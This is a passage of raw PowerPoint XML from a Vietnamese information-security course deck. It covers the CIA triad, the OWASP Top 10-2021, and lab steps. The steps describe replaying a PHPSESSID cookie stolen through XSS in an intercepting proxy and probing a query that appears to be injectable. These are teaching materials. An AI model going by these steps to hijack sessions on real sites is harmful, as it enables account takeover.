              </a:rPr>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>duyệt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> qua button Open Browser.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AC65F7C-E551-AD7C-5F43-60185B868E5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="1610711"/>
            <a:ext cx="8572500" cy="4104289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3644281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457200" y="295478"/>
            <a:ext cx="8328780" cy="1736373"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1. GIỚI THIỆU TỔNG QUAN</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" dirty="0"/>
              <a:t>1.1. Các Khái Niệm Cơ Bản Về An Toàn Thông Tin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="4400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" sz="4400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr spc="-10" dirty="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a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62889DF3-7671-18DF-1C18-09BDF9645A35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395415" y="2407097"/>
            <a:ext cx="4531679" cy="2492990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Đây</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mô</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hình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cốt</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lõi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nền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tảng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của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>toàn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thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> tin. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nó định nghĩa ba mục tiêu chính mà mọi chiến lược bảo mật cần hướng tới để bảo vệ thông tin và hệ thống</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18" descr="An toàn thông tin mạng là gì? Giải pháp bảo mật an toàn ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66C1BB2A-58B4-3D6B-E012-E9A88F012B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2759" y="2340402"/>
            <a:ext cx="4195445" cy="2559685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4E298EC-8DA0-E004-CA55-FDA530CD0D1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1382712"/>
            <a:ext cx="8661005" cy="892552"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>1.1.1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>giác</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bảo</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mật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> CIA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t> (Confidentiality, Integrity, Availability)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92E3E-77E5-4FC8-23ED-E7BDEE08A02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68250A-1CE4-DA26-AE08-ACC21B35F036}"/>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F34FE45-BD6E-777C-9C6B-8E1A2C5CD3EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="295478"/>
            <a:ext cx="8455660" cy="2598147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>1.3.2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Phân</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>tích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>chính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> OWASP Top 10-2021</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8873C486-0FC1-DA46-4AC6-7A3C5D1965B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a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F673230D-6F3F-A7A0-FF1B-0DBCDAF1996D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226541" y="1969322"/>
            <a:ext cx="4808357" cy="287514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A04:2021-Insecure Design (Thiết kế không an toàn): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Danh mục mới, nhấn mạnh tầm quan trọng của việc thiết kế an toàn ngay từ giai đoạn đầu dự án.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7172" name="Picture 4" descr="OWASP Top 10 security vulnerabilities 2021 Evalian®">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C6F131D-D60B-04F6-16AB-C79E0EB89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20294"/>
            <a:ext cx="3923030" cy="385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240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F0295-1C11-ECBD-82EE-678214AD475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521FFA1-70C9-3177-B878-0D56D419B54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2E493867-38F2-C53C-CC28-7F4FF0255053}"/>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200</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AA54709-8232-2804-F43C-5141553324A0}"/>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Thêm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>vào</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Cookie: PHPSESSID=&lt;Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>nhận</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>việc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>khai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> XSS&gt;. Sau </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>đó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Forward </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>xem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E0910D6-705E-5DE9-2604-FDDB2EE11C6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="1254883"/>
            <a:ext cx="9144000" cy="4377908"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22981525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4825B-ED50-53CC-8FE6-49AEA57F8F5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137772-58EA-7EF0-0A78-51DA5127AA9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25257CBC-FED5-4B1A-D1EA-1E8836F18AC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201</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2C82DC7-870F-45C3-CBCB-7E403ABA2697}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>
            <a:ext cx="8915400" cy="169533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Kết quả là trang báo lỗi Trying to get property ‘.</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Có thể phán đoán câu truy vấn có dạng như sau:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="354965" indent="-342265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E55422B5-5001-EB8E-5154-05A08292E078}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1541956" y="1819369"/>
            <a:ext cx="6060087" cy="1997074"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17512282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F9C56-6A91-43DE-B73F-BB1EA3D1A76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EAAE32D-24A4-C810-8BEF-37EB6912937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84685182-5B45-C321-6C7F-2ACF7F26AA7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202</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD1D0CFA-BF9C-ECA8-B84B-4555508377F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="677722"/>
            <a:ext cx="8915400" cy="4359556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39294160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C25A2-7594-DC32-BB23-3EA144AC498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62FFEA9-4107-B1D4-9086-AEC2B9E1588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2885C51-3293-438A-B0B2-F46338A1AB3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203</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9096762B-2A46-854E-0FB7-13536F1F5AE4}"/>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Kết </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> webserver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>vẫn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>phản</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hồi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>: HTTP/1.1 200 OK. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0720A824-973D-A7BF-72CD-B44DB36F608D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="82550" y="1279414"/>
            <a:ext cx="9029700" cy="4270463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17473887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7444B-DAD6-6091-B286-F229A73F2D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676CAD7-C7E2-39C3-68C6-8ECD21C40DA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798F026C-91B6-71F2-69D4-DE1FF05C489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204</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC148CFB-B830-B2FE-5D99-0263A7595F9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
